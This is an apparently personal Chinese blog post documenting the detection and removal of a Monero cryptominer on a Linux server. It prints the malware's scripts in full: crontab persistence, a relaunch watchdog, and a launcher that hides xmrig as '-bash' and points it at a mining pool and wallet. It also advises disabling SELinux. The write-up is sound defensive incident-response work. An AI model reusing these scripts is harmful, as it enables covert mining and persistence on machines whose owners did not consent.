记一次门罗币查杀全过程

门罗币 病毒查杀过程全记录

 

 

 

• 1，查找CPU 最高的进程 

ps -aux | sort -k3nr  | head  -10  
root      91087  193 44.7 2210756 1729700 ?   Sl   Mar17 10752:52 -bash  --library-path stak stak/xmrig

• 2，查到病毒名称 带有-bash，查看病毒服务器端口和ip地址情况

netstat -anp|grep ESTABLISHED  |  grep -E  "*/-bash"
tcp        0      0 172.16.30.66:51958      101.99.84.65:80         ESTABLISHED 91087/-bash  

• 3，查看病毒安装的目录情况  

ls  -la   /proc/病毒pid
[root@apptrace66 .ssh]# ll  /proc/91087
total 0
dr-xr-xr-x. 2 root root 0 Mar 20 22:54 attr
-rw-r--r--. 1 root root 0 Mar 21 00:33 autogroup
-r--------. 1 root root 0 Mar 21 00:33 auxv
-r--r--r--. 1 root root 0 Mar 21 00:33 cgroup
--w-------. 1 root root 0 Mar 21 00:33 clear_refs
-r--r--r--. 1 root root 0 Mar 17 04:12 cmdline
-rw-r--r--. 1 root root 0 Mar 21 00:33 comm
-rw-r--r--. 1 root root 0 Mar 21 00:33 coredump_filter
-r--r--r--. 1 root root 0 Mar 21 00:33 cpuset
lrwxrwxrwx. 1 root root 0 Mar 21 00:33 cwd -> /dev/shm/.ssh
-r--------. 1 root root 0 Mar 21 00:33 environ
lrwxrwxrwx. 1 root root 0 Mar 17 04:03 exe -> /dev/shm/.ssh/stak/ld-linux-x86-64.so.2

cwd符号链接的是进程运行目录；
exe符号连接就是执行程序的绝对路径；
我们这次病毒 可以查看出 运行目录是 /dev/shm/.ssh

 

• 4，ll  -la  查看这个目录有哪些文件（可选步骤，ls一定要用 -a参数，避免隐藏文件遗漏），

[root@apptrace66 .ssh]# ll  /dev/shm/.ssh  -a
total 856
drwxr-xr-x. 3 1000 dtuser    280 Mar 20 23:06 .
drwxrwxrwt. 3 root root       60 Mar 17 04:02 ..
-rwxr-xr-x. 1 1000 dtuser    329 Oct 27  2017 a
-rw-r--r--. 1 root root        0 Mar 17 04:03 .a
-rw-r--r--. 1 root root        6 Mar 17 04:03 bash.pid
-rwxr-xr-x. 1 1000 dtuser   2318 Apr 22  2018 c
-rw-r--r--. 1 root root       44 Mar 17 04:03 cron.d
-rw-r--r--. 1 root root       14 Mar 17 04:03 dir.dir
-rwxr-xr-x. 1 1000 dtuser 838583 Feb 20  2016 h64
-rwxr-xr-x. 1 1000 dtuser    555 Oct 12 08:50 run
drwxr-xr-x. 2 1000 dtuser    720 Mar  5 08:58 stak
-rwxr--r--. 1 1000 dtuser    188 Mar 17 04:03 upd
-rwxr-xr-x. 1 1000 dtuser     24 Oct  4  2017 x
-rwxr-xr-x. 1 1000 dtuser     73 Oct  4 10:57 z

查看定时任务里面的内容：
 * * * * * $dir/upd
 逐个查看  /dev/shm/.ssh 目录下的文件，都有什么内容
 然后再查看 udp 文件里面的内容：

 #!/bin/sh
if test -r /dev/shm/.ssh/bash.pid; then
pid=$(cat /dev/shm/.ssh/bash.pid)
if $(kill -CHLD $pid >/dev/null 2>&1)
then
sleep 1
else
cd /dev/shm/.ssh
./run &>/dev/null
exit 0
fi
fi
~

文件a  里面的内容：
pwd > dir.dir
dir=$(cat dir.dir)
echo "* * * * * /dev/shm/.ssh/upd >/dev/null 2>&1" > cron.d
crontab cron.d
crontab -l | grep upd
echo "#!/bin/sh
if test -r $dir/bash.pid; then
pid=\$(cat $dir/bash.pid)
if \$(kill -CHLD \$pid >/dev/null 2>&1)
then
sleep 1
else
cd $dir
./run &>/dev/null
exit 0
fi
fi" >upd
chmod u+x upd
./run &>/dev/null

文件run 的内容
#!/bin/bash
#ps aux | grep -vw xmr-stak | awk '{if($3>40.0) print $2}' | while read procid
#do
#kill -9 $procid
#done
proc=`nproc`
ARCH=`uname -m`
HIDE="-bash"

if [ "$ARCH" == "i686" ];       then
        ./h32 -s $HIDE ./md32 -a cryptonight -o stratum+tcp://45.32.155.230:3333 -u etnk5c12V3YAb5gLekc5N8SizEpbpDogviaU2U9tff2F9JafNFS9pxmF1PNf4aZrMjRSqd9bhjXn7dbpmepNjKi586ZtD9Cv9N -p x >>/dev/null &
elif [ "$ARCH" == "x86_64" ];   then
        ./h64 -s $HIDE ./stak/ld-linux-x86-64.so.2 --library-path stak stak/xmrig >>/dev/null &
fi
echo $! > bash.pid

x  z 文件的内容：
[root@apptrace66 .ssh]# cat  x  z
nohup ./a >>/dev/null &
./stak/ld-linux-x86-64.so.2 --library-path stak stak/xmrig >>/dev/null &

/dev/shm/.ssh/stak 是个目录  里面全部是病毒 

 

 

 

• 5，正常的/dev/shm/ 目录是没有.ssh子目录的，如果不想一一查看上面文件，直接把这个.ssh目录删除了 

 

• 6，开启防火墙（可选步骤）
• 7，查看和重置环境变量  ,使用printenv 或者env 都可以

LOGNAME=root
SSH_CONNECTION=192.1xx.1.1xx 60094 172.16.30.66 22
LESSOPEN=||/usr/bin/lesspipe.sh %s
XDG_RUNTIME_DIR=/run/user/0
OLDPWD=/dev/shm/.ssh
_=/usr/bin/env

 

 

如果有病毒环境变量 在配置文件去掉后 source  /etc/profile，如果配置文件找不到 也可以执行这句话，使环境变量更新
从环境变量可以看出  病毒是从SSH_CONNECTION=192.1xx.1.1xx 60094 连接进来的  这个ip 要确认是那台机器的 是否是
机器，/usr/bin/lesspipe.sh  这个文件 我们查看验证一下，没有问题就算了；在/etc/profile ~/下的.bashrc  .bash_profile 
都没有查找到病毒的环境变量配置，进入到/etc/profile.d/查找 也没找到病毒相关环境变量配置  

• 8,最后在删除crontab里面的内容：

crontab  -e    删除里面病毒定时任务（如果有）

• 9,/etc/selinux/config 设置SELINUX=disabled 然后setenforce 0  避免重启后无法通过跳板机登录的问题
• 10，最后重启机器 ，然后修改密码

病毒详细说明：http://tldp.org/HOWTO/Program-Library-HOWTO/shared-libraries.html 门罗币 

本人博客网站：https://blog.zhenglin.work/